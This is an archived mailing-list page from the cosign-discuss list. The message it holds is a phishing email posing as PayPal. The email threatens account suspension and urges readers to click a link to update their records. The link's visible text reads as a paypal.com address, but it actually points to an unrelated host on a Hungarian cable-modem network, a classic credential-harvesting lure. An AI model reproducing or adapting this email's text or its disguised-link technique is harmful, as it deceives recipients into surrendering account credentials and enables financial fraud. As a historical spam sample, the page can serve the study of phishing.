<!-- MHonArc v2.6.8 -->
<!--X-Subject: PayPal Inc: confirm your details to avoid service cancellation [Wed, 17 Aug 2005 08:28:05 &#45;0200] -->
<!--X-From-R13: BnlBny <vqragqrc_bc5850Ncnlcny.pbz> -->
<!--X-Date: Sat, 20 Aug 2005 18:32:56 &#45;0400 (EDT) -->
<!--X-Message-Id: E1E6bsI&#45;0004oA&#45;9x@cedar.webtreehost.com -->
<!--X-Content-Type: text/html -->
<!--X-Head-End-->
<!--#set var="trail" value="../" -->
<!--#set var="title" value="discuss" -->
<!--#set var="download" value="" -->
<!--#set var="build" value="" -->
<!--#set var="overview" value="" -->
<!--#set var="faq" value="" -->
<!--#set var="filter" value="" -->
<!--#set var="roadmap" value="" -->
<!--#set var="license" value="" -->
<!--#set var="lists" value="y" -->
<!--#include virtual="../header.shtml" -->

<table width="100%"  border="0" cellspacing="0" cellpadding="0">
    <tr>
        <td width="18" rowspan="2" align="left" valign="middle"><img src="../images/chevron_blue_lg.gif" width="12" height="20"></td>
        <td class="cnt-head1">
            cosign-discuss at umich.edu
        </td>
    </tr>

    <tr>
        <td class="cnt-sub-ital">
            general discussion of cosign development and deployment
        </td>
    </tr>

    <tr>
        <td colspan="2" align="left" valign="middle" class="line-bluedot">&nbsp;
</td>
    </tr>
</table>

<!--X-Body-Begin-->
<!--X-User-Header-->
<!--X-User-Header-End-->
<!--X-TopPNI-->
<hr>
[<a href="msg00523.shtml">Date Prev</a>][<a href="msg00525.shtml">Date Next</a>][<a href="msg00522.shtml">Thread Prev</a>][<a href="msg00525.shtml">Thread Next</a>][<a href="maillist.shtml#00524">Date Index</a>][<a href="threads.shtml#00524">Thread Index</a>]
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1>PayPal Inc: confirm your details to avoid service cancellation [Wed, 17 Aug 2005 08:28:05 -0200]</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<ul>
<li><em>To</em>: <a href="mailto:cosign-discuss@DOMAIN.HIDDEN">cosign-discuss@xxxxxxxxx</a></li>
<li><em>Subject</em>: PayPal Inc: confirm your details to avoid service cancellation [Wed, 17 Aug 2005 08:28:05 -0200]</li>
<li><em>From</em>: PayPal &lt;<a href="mailto:identdep_op5850@DOMAIN.HIDDEN">identdep_op5850@xxxxxxxxxx</a>&gt;</li>
<li><em>Date</em>: Sat, 20 Aug 2005 17:31:38 -0500</li>
<li><em>Reply-to</em>: <a href="mailto:identdep_op5850@DOMAIN.HIDDEN">identdep_op5850@xxxxxxxxxx</a></li>
</ul>
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<DIV align=left><A href="http://www.paypal.com/"><IMG src="" border=0></A>&#xA0; </DIV>
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR>
<TD colSpan=3><IMG height=2 src="" width=2></TD></TR></TBODY></TABLE><A href="http://www.paypal.com/cgi-bin/webscr?cmd=_login-run"></A>
<TABLE width="50%" border=0>
<TBODY>
<TR>
<TD>
<P><FONT size=2><FONT face=Verdana>Dear valued&#xA0;<STRONG><STRONG><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">PayPal<SUP>&#xAE;</SUP></SPAN></STRONG>&#xA0;</STRONG>member</FONT>:&#xA0;<BR></FONT><BR></P>
<P><FONT face=Verdana size=2>It has come to our attention that your&#xA0;<SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>&#xAE;</SUP></STRONG></SPAN> account information needs to be&#xA0;updated as part of our continuing commitment to protect your account and to&#xA0;reduce the instance of fraud on our website.&#xA0;</FONT><FONT face=Verdana size=2><FONT face=Verdana size=2> If you could please take 5-10 minutes&#xA0;out of your </FONT><FONT face=Verdana size=2>online </FONT><FONT face=Verdana size=2>experience and update your personal records you will not run into&#xA0;any future </FONT><FONT face=Verdana size=2>problems with the online service.&#xA0;<BR>&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;</FONT></FONT></P><FONT face=Verdana size=2>
<P><FONT face=Verdana size=2>However, failure to update your records will result in account suspension.&#xA0;<BR>&#xA0;<BR><BR>Once you have updated your account records, your&#xA0;<SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>&#xAE;</SUP></STRONG></SPAN> session will not be&#xA0;interrupted and will continue as normal. </FONT></P>
<P><FONT face=Verdana size=2>To update your <SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>&#xAE;</SUP></STRONG></SPAN> records click on the following link:&#xA0;<BR></FONT><A href="http://82-79-99-99.cable-modem.hdsnet.hu/~guest/.PayPal/"><FONT face=Verdana size=2>http://www.paypal.com/cgi-bin/webscr?cmd=_login-run</FONT></A></P>
<P><FONT face=Verdana size=2></FONT>&#xA0;</P>
<P><FONT face=Verdana size=2>Thank You. &#xA0;<BR><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>&#xAE; </SUP><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">UPDATE </SPAN></STRONG><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>TEAM</STRONG></SPAN></SPAN>&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0; </FONT></P><IMG src="" border=0> <FONT face=Verdana size=2>
<P><FONT face=Verdana size=2>Accounts Management As outlined in our User Agreement, <SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>&#xAE;</SUP></STRONG></SPAN> will&#xA0;periodically send you information about site changes and enhancements. </FONT></P></FONT></FONT></TD></TR></TBODY></TABLE>





<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<ul>
<li>Prev by Date:
<strong><a href="msg00523.shtml">Restore Your Account Access</a></strong>
</li>
<li>Next by Date:
<strong><a href="msg00525.shtml">BFK Business</a></strong>
</li>
<li>Previous by thread:
<strong><a href="msg00522.shtml">Re: Qualifications for end of Session</a></strong>
</li>
<li>Next by thread:
<strong><a href="msg00525.shtml">BFK Business</a></strong>
</li>
<li>Index(es):
<ul>
<li><a href="maillist.shtml#00524"><strong>Date</strong></a></li>
<li><a href="threads.shtml#00524"><strong>Thread</strong></a></li>
</ul>
</li>
</ul>

<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<!--#include virtual="../footer.shtml" -->

